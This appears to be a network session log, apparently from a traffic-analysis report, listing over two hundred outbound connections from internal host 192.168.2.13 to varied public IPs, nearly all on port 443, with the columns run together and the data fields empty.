                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23937192.168.2.1357062217.193.182.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23938192.168.2.134314487.15.19.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23939192.168.2.1346330102.235.103.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23940192.168.2.1353928137.4.68.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23941192.168.2.134427232.66.25.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23942192.168.2.134628653.171.211.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23943192.168.2.1356396201.242.75.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23944192.168.2.135459646.58.143.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23945192.168.2.1336206185.165.213.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23946192.168.2.1343286168.242.12.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23947192.168.2.1347590153.241.117.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23948192.168.2.1354156159.209.107.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23949192.168.2.1341574212.126.32.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23950192.168.2.1351664223.222.156.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23951192.168.2.1345446119.214.42.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23952192.168.2.133961842.236.45.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23953192.168.2.133286690.9.96.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23954192.168.2.133545847.60.97.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23955192.168.2.135782483.86.90.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23956192.168.2.134183634.203.242.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23957192.168.2.135227688.66.112.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23958192.168.2.1345652190.66.43.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23959192.168.2.135758639.226.45.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23960192.168.2.135901443.65.230.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23961192.168.2.1360950205.222.84.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23962192.168.2.134084217.128.25.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23963192.168.2.1354896201.148.225.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23964192.168.2.1341654198.247.153.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23965192.168.2.134008093.182.151.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23966192.168.2.1351894176.209.101.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23967192.168.2.135575679.144.58.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23968192.168.2.1337092118.94.145.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23969192.168.2.1353168185.120.101.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23970192.168.2.134900057.23.183.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23971192.168.2.133910675.200.167.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23972192.168.2.133473494.55.10.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23973192.168.2.1353310223.161.169.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23974192.168.2.136023672.201.59.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23975192.168.2.1336984123.181.156.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23976192.168.2.1355646142.195.71.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23977192.168.2.1358378136.77.240.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23978192.168.2.1335184189.145.46.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23979192.168.2.1339692152.238.29.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23980192.168.2.1353886133.182.220.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23981192.168.2.1333786126.14.21.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23982192.168.2.1345756201.155.17.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23983192.168.2.1360416176.5.106.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23984192.168.2.1351564189.213.156.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23985192.168.2.1350310172.155.14.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23986192.168.2.1337414137.97.238.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23987192.168.2.1360572114.93.216.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23988192.168.2.135111864.6.223.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23989192.168.2.1341318221.77.202.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23990192.168.2.1360404181.255.139.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23991192.168.2.1343918147.8.130.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23992192.168.2.1358228202.94.28.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23993192.168.2.1356332187.99.211.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23994192.168.2.1357512122.15.217.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23995192.168.2.1358478145.148.235.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23996192.168.2.1346630166.206.201.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23997192.168.2.1360368108.168.168.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23998192.168.2.1351570133.17.9.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23999192.168.2.134307463.40.156.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24000192.168.2.1346966116.216.90.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24001192.168.2.1358040112.2.101.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24002192.168.2.134658042.5.106.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24003192.168.2.133476047.54.92.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24004192.168.2.1349432153.91.128.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24005192.168.2.135081072.135.60.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24006192.168.2.1334646110.174.11.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24007192.168.2.135727838.106.213.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24008192.168.2.133840472.128.79.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24009192.168.2.1357172156.244.167.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24010192.168.2.134950025.33.147.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24011192.168.2.1346752162.26.140.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24012192.168.2.1345864210.176.39.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24013192.168.2.1359300151.69.124.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24014192.168.2.134618059.89.107.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24015192.168.2.1333972141.239.192.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24016192.168.2.134918285.237.83.1938080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24017192.168.2.134191249.250.103.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24018192.168.2.13344202.238.208.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24019192.168.2.1345680144.134.123.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24020192.168.2.1334812221.73.63.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24021192.168.2.134513262.151.254.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24022192.168.2.134160463.96.74.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24023192.168.2.136093058.47.129.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24024192.168.2.133614840.145.104.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24025192.168.2.1351018198.159.69.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24026192.168.2.1333232201.206.92.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24027192.168.2.1343420146.37.190.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24028192.168.2.1350680116.31.217.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24029192.168.2.1342592165.227.159.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24030192.168.2.1337320124.243.22.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24031192.168.2.1340402201.98.118.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24032192.168.2.133926032.105.226.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24033192.168.2.1339110138.14.239.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24034192.168.2.135824640.124.3.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24035192.168.2.134346817.215.47.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24036192.168.2.1341016118.154.53.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24037192.168.2.1333722143.65.85.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24038192.168.2.1334266182.29.210.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24039192.168.2.133883820.81.209.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24040192.168.2.1333778112.101.252.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24041192.168.2.1355734207.203.105.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24042192.168.2.1359426138.26.80.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24043192.168.2.133433678.172.33.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24044192.168.2.1341624151.115.3.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24045192.168.2.1356398210.254.115.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24046192.168.2.135152263.163.22.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24047192.168.2.1353952192.70.180.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24048192.168.2.1348040150.121.90.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24049192.168.2.134121073.42.123.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24050192.168.2.135884064.143.42.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24051192.168.2.1345138110.2.97.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24052192.168.2.134250088.162.94.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24053192.168.2.135956432.142.180.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24054192.168.2.1342742201.163.51.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24055192.168.2.1345096160.187.70.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24056192.168.2.135584476.155.29.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24057192.168.2.134787472.100.97.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24058192.168.2.1341460187.210.71.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24059192.168.2.1353984208.212.149.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24060192.168.2.1360348174.236.174.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24061192.168.2.1359224177.136.42.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24062192.168.2.134554244.16.36.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24063192.168.2.1336772190.90.68.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24064192.168.2.1360816202.137.62.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24065192.168.2.135056434.240.233.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24066192.168.2.134136861.48.150.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24067192.168.2.1333636156.78.185.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24068192.168.2.1351444113.155.78.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24069192.168.2.1354330160.89.244.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24070192.168.2.1345096199.252.85.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24071192.168.2.134144675.119.249.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24072192.168.2.1336456158.10.91.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24073192.168.2.135573089.236.244.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24074192.168.2.1336920139.154.210.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24075192.168.2.134501827.54.78.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24076192.168.2.1354282122.116.49.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24077192.168.2.135283642.149.113.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24078192.168.2.135313871.145.253.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24079192.168.2.1337712179.97.159.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24080192.168.2.1351562143.128.7.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24081192.168.2.1338960119.32.82.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24082192.168.2.133579667.135.87.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24083192.168.2.133342212.87.12.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24084192.168.2.1353744220.6.237.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24085192.168.2.1334784183.179.2.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24086192.168.2.1356800158.24.143.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24087192.168.2.1353360101.172.41.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24088192.168.2.134851817.133.84.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24089192.168.2.1339110192.134.161.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24090192.168.2.135342432.211.207.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24091192.168.2.1355700102.84.64.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24092192.168.2.1345052176.241.185.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24093192.168.2.135360880.132.42.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24094192.168.2.136061279.173.176.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24095192.168.2.1333970150.189.10.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24096192.168.2.1338802129.0.101.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24097192.168.2.1346752156.10.13.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24098192.168.2.1358998156.4.41.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24099192.168.2.1353748177.51.60.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24100192.168.2.1340248161.37.117.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24101192.168.2.135286877.218.18.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24102192.168.2.134477444.33.198.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24103192.168.2.1348354187.1.65.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24104192.168.2.133512647.57.174.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24105192.168.2.1339294145.27.4.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24106192.168.2.1337858220.216.82.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24107192.168.2.1356214163.129.7.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24108192.168.2.1345404147.159.124.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24109192.168.2.1359642208.56.77.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24110192.168.2.1354842160.186.116.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24111192.168.2.1349356156.233.93.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24112192.168.2.1337604160.108.170.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24113192.168.2.1346172135.226.34.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24114192.168.2.135828244.66.124.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24115192.168.2.1334792111.181.29.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24116192.168.2.135378687.74.71.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24117192.168.2.13552645.188.214.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24118192.168.2.13457328.232.138.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24119192.168.2.135731884.59.47.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24120192.168.2.133961495.174.200.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24121192.168.2.134250077.196.250.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24122192.168.2.1342246171.164.44.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24123192.168.2.1336340172.38.11.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24124192.168.2.1339666179.165.138.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24125192.168.2.1349850116.165.126.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24126192.168.2.1359568108.87.232.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24127192.168.2.135173085.148.123.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24128192.168.2.135912089.246.124.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24129192.168.2.133823449.108.201.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24130192.168.2.1335652139.111.6.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24131192.168.2.134869849.179.183.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24132192.168.2.1353076170.145.139.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24133192.168.2.1338614156.204.177.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24134192.168.2.1360432191.203.81.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24135192.168.2.1341582147.214.236.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24136192.168.2.134959273.36.205.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24137192.168.2.1354292170.248.100.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24138192.168.2.135010046.238.224.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24139192.168.2.133491057.216.136.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24140192.168.2.1335340125.112.22.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24141192.168.2.135292220.162.84.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24142192.168.2.1351434165.98.218.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24143192.168.2.134079272.52.228.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24144192.168.2.136082852.25.238.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24145192.168.2.1336604123.241.145.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24146192.168.2.133951464.216.146.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24147192.168.2.13412541.100.91.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24148192.168.2.1337276148.234.249.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24149192.168.2.133756890.43.189.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24150192.168.2.135437892.119.181.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24151192.168.2.133600676.116.150.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24152192.168.2.1333506201.113.254.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24153192.168.2.134620073.161.70.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24154192.168.2.1341282115.103.192.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24155192.168.2.135254257.213.241.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24156192.168.2.1346482155.180.52.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24157192.168.2.1337962101.202.53.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
